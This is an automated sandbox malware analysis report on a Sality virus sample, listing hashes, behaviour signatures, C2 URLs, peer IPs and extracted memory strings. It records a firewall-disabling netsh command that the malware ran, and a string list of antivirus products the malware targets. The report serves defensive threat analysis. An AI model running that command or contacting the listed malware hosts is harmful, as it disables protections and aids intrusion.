
Windows Analysis Report
LisectAVT_2403002B_38.exe

Overview

General Information

Sample name: LisectAVT_2403002B_38.exe
Analysis ID: 1481739
MD5: dcd409fa904f30ab580781337fb866b7
SHA1: e377b6810bb20b46ec0ce24020a58dfec7f94b18
SHA256: 2cca553e01de4f4ba2f5eaa1b0b1bc8bfbaee289d7b95dbdb3d6e0d67cd9c7fd
Tags: exe, Sality

Detection

Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disable Task Manager(disabletaskmgr)
Disables UAC (registry)
Disables the Windows registry editor (regedit)
Disables the Windows task manager (taskmgr)
Disables the windows firewall (over ALG)
Disables user account control notifications
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
PE file has a writeable .text section
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Connects to several IPs in different countries
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LisectAVT_2403002B_38.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_38.exe" MD5: DCD409FA904F30AB580781337FB866B7)
    • netsh.exe (PID: 3184 cmdline: netsh firewall set opmode disable MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • cleanup
Name: Sality
Description: F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware. Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.
Infection: Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult. Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.
Payload: Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
Attribution: Salty Spider
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
No configs have been found
Yara matches:
  • Source: 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Sality; Description: Yara detected Sality; Author: Joe Security
  • Source: Process Memory Space: LisectAVT_2403002B_38.exe PID: 7092; Rule: JoeSecurity_Sality; Description: Yara detected Sality; Author: Joe Security
  • Source: 0.2.LisectAVT_2403002B_38.exe.22f0000.5.unpack; Rule: JoeSecurity_Sality; Description: Yara detected Sality; Author: Joe Security

        System Summary

        Source: Registry Key set; Author: frack113; Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe, ProcessId: 7092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
        No Snort rule has matched

        Suricata alerts:
          • Timestamp: 2024-07-25T13:45:08.202500+0200; SID: 2018340; Source Port: 49710; Destination Port: 80; Protocol: TCP; Classtype: Malware Command and Control Activity Detected
          • Timestamp: 2024-07-25T13:45:06.951501+0200; SID: 2018340; Source Port: 49709; Destination Port: 80; Protocol: TCP; Classtype: Malware Command and Control Activity Detected
          • Timestamp: 2024-07-25T13:45:22.156809+0200; SID: 2022930; Source Port: 443; Destination Port: 49715; Protocol: TCP; Classtype: A Network Trojan was detected
          • Timestamp: 2024-07-25T13:46:00.464743+0200; SID: 2022930; Source Port: 443; Destination Port: 49722; Protocol: TCP; Classtype: A Network Trojan was detected


        AV Detection

        Source: LisectAVT_2403002B_38.exe; Avira: detected
        Source: http://kukutrustnet987.info/home.gifAvira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gif?76caf3=7785203LAvira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gifAvira URL Cloud: Label: malware
        Source: http://www.ukikt.org/mainf.gifAvira URL Cloud: Label: malware
        Source: http://www.klkjwre9fqwieluoi.info/Avira URL Cloud: Label: malware
        Source: http://klkjwre77638dfqwieuoi888.info/Avira URL Cloud: Label: malware
        Source: http://kukutrustnet888.info/home.gifAvira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gif?7231d3=37419295sAvira URL Cloud: Label: malware
        Source: http://lpbmx.ru/logos.gif?722bd8=7482328Avira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gif?7231d3=374192954Avira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gifAvira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/DisableTaskMgrSoftwareAvira URL Cloud: Label: phishing
        Source: http://kukutrustnet777.info/home.gifAvira URL Cloud: Label: malware
        Source: http://ramoo.w8w.pl/mainh.gifAvira URL Cloud: Label: malware
        Source: http://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdriversAvira URL Cloud: Label: malware
        Source: http://lpbmx.ru/logos.gifAvira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gif?76caf3=7785203Avira URL Cloud: Label: malware
        Source: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gifAvira URL Cloud: Label: malware
        Source: http://jrsx.jre.net.cn/logos.gifAvira URL Cloud: Label: malware
        Source: http://jrsx.jre.net.cn/logos.gif?723619=74849530CEAvira URL Cloud: Label: malware
        Source: http://lpbmx.ru/logos.gif?722bd8=74823287h)Avira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/mainf.gif?76caf3=7785203jAvira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/Avira URL Cloud: Label: phishing
        Source: http://lpbmx.ru/logos.gifhttp://macedonia.my1.ru/mainh.gifhttp://jrsx.jre.net.cn/logos.gifhttp://steAvira URL Cloud: Label: malware
        Source: http://89.119.67.154/testo5/Avira URL Cloud: Label: malware
        Source: http://macedonia.my1.ru/mainh.gif?7231d3=37419295Avira URL Cloud: Label: malware
        Source: http://steamboy.h17.ru/UAvira URL Cloud: Label: malware
        Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
        Source: LisectAVT_2403002B_38.exe; Joe Sandbox ML: detected
        Source: LisectAVT_2403002B_38.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 195.201.126.132:443 -> 192.168.2.8:49712 version: TLS 1.2
        Source: Binary string: notepad.pdbGCTL source: ipyr.exe.0.dr
        Source: Binary string: notepad.pdb source: ipyr.exe.0.dr

        Spreading

        Source: Yara match; File source: 0.2.LisectAVT_2403002B_38.exe.22f0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002B_38.exe PID: 7092, type: MEMORYSTR
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 0_kkiuynbvnbrev406C:\l8geqpHJTkdns0MCIDRV_VEROpera/8.89 (Windows NT 6.0; U; en)MPRNtQuerySystemInformationGlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_90830SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List%s:*:Enabled:ipsecNOTEPAD.EXENOTEPAD.EXEWINMINE.EXENOTEPAD.EXENOTEPAD.EXESOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMBhttp://\Runhttphttp://klkjwre77638dfqwieuoi888.info/www.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\abp470n5.EXE.SCRSfcIsFileProtectedsfcWINDOWSdrw.VDB.AVCNTDLL.DLLrnd=autorun.infWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERCreateThreadwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! 
Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardavp1BackWeb Plug-in - 4476822bdssBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagernavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwtmproxytcpsrUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallXCOMMAVPSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exe_AVPM.A2GUARD.AAVSHIELD.AVASTADVCHK.AHNSD.AIRDEFENSEALERTSVCALOGSERVALSVC.AMON.ANTI-TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ATCON.ATUPDATER.ATWATCH.AVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVGAMSVR.AVGCC.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVGNTDDAVGNTMGRAVGSERV.AVGUARD.AVGUPSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVPM.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITOR9X.AVXMONITORNT.AVXQUAR.BDMCON.BDNEWS.BDSUBMIT.BDSWITCH.BLACKD.BLACKICE.CAFIX.CCAPP.CCEVTMGR.CCPROXY.CCSETMGR.CFIAUDIT.CLAMTRAY.CLAMWIN.CLAW95.CUREITDEFWATCH.DRVIRUS.DRWADINS.DRWEB32W.DRWEBSCD.DRWEBUPW.DWEBLLIODWEBIOESCANH95.ESCANHNT.EWIDOCTRL
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004099CB DialogBoxParamA,_memset,_memset,_memset,GetSystemDirectoryA,_swprintf,FindFirstFileA,FindFirstFileA,_strcpy_s,SHGetFolderPathA,_swprintf,FindFirstFileA,_strcpy_s,0_2_004099CB
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00401A50 FindFirstFileA,SetLastError,GetLastError,GetLastError,FindNextFileA,GetLastError,FindClose,0_2_00401A50
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00409700 GetWindowsDirectoryA,_sprintf,_sprintf,FindFirstFileA,_printf,_sprintf,FindClose,FindNextFileA,FindNextFileA,_sprintf,FindNextFileA,FindClose,FindClose,0_2_00409700
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FFA87 Sleep,FindFirstFileA,FindNextFileA,FindClose,Sleep,0_2_022FFA87
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FB81A FindFirstFileA,FindNextFileA,Sleep,0_2_022FB81A
        Source: unknownNetwork traffic detected: IP country count 10
        Source: global trafficUDP traffic: 192.168.2.8:50152 -> 94.76.218.18:1743
        Source: global trafficUDP traffic: 192.168.2.8:50153 -> 94.76.206.216:1743
        Source: global trafficUDP traffic: 192.168.2.8:50154 -> 189.68.58.176:8040
        Source: global trafficUDP traffic: 192.168.2.8:50155 -> 81.190.94.112:6724
        Source: global trafficUDP traffic: 192.168.2.8:50156 -> 77.122.85.173:4956
        Source: global trafficUDP traffic: 192.168.2.8:50157 -> 201.45.100.171:6820
        Source: global trafficUDP traffic: 192.168.2.8:50158 -> 217.70.126.141:5630
        Source: global trafficUDP traffic: 192.168.2.8:55414 -> 81.10.9.50:5569
        Source: global trafficUDP traffic: 192.168.2.8:55415 -> 94.50.7.74:4580
        Source: global trafficUDP traffic: 192.168.2.8:54732 -> 77.39.42.64:7886
        Source: global trafficUDP traffic: 192.168.2.8:61919 -> 80.69.51.98:7886
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 94.76.218.18
        Source: unknownUDP traffic detected without corresponding DNS query: 94.76.206.216
        Source: unknownUDP traffic detected without corresponding DNS query: 189.68.58.176
        Source: unknownUDP traffic detected without corresponding DNS query: 81.190.94.112
        Source: unknownUDP traffic detected without corresponding DNS query: 77.122.85.173
        Source: unknownUDP traffic detected without corresponding DNS query: 201.45.100.171
        Source: unknownUDP traffic detected without corresponding DNS query: 217.70.126.141
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 94.50.7.74
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 77.39.42.64
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 80.69.51.98
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FF805 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,FindCloseChangeNotification,InternetCloseHandle,InternetCloseHandle,0_2_022FF805
        Source: global trafficHTTP traffic detected: GET /mainh.gif?7231d3=37419295 HTTP/1.1User-Agent: Opera/8.89 (Windows NT 6.0; U; en)Host: macedonia.my1.ruCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /mainf.gif?76caf3=7785203 HTTP/1.1User-Agent: Opera/8.89 (Windows NT 6.0; U; en)Host: steamboy.h17.ruCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: lpbmx.ru
        Source: global trafficDNS traffic detected: DNS query: macedonia.my1.ru
        Source: global trafficDNS traffic detected: DNS query: jrsx.jre.net.cn
        Source: global trafficDNS traffic detected: DNS query: steamboy.h17.ru
        Source: global trafficDNS traffic detected: DNS query: www.otzywy.com
        Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.8.0; Date: Thu, 25 Jul 2024 11:45:05 GMT; Content-Type: text/html; charset=UTF-8; Transfer-Encoding: chunked; Connection: keep-alive; Keep-Alive: timeout=15
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://jrsx.jre.net.cn/logos.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jrsx.jre.net.cn/logos.gif?723619=74849530
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jrsx.jre.net.cn/logos.gif?723619=74849530CE
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://klkjwre77638dfqwieuoi888.info/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.000000000051E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gif?722bd8=7482328
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gif?722bd8=74823287h)
        Source: LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://lpbmx.ru/logos.gifhttp://macedonia.my1.ru/mainh.gifhttp://jrsx.jre.net.cn/logos.gifhttp://ste
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif?7231d3=37419295
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif?7231d3=374192954
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif?7231d3=37419295s
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://ramoo.w8w.pl/mainh.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://steamboy.h17.ru/U
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://steamboy.h17.ru/mainf.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://steamboy.h17.ru/mainf.gif?76caf3=7785203
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://steamboy.h17.ru/mainf.gif?76caf3=7785203L
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://steamboy.h17.ru/mainf.gif?76caf3=7785203j
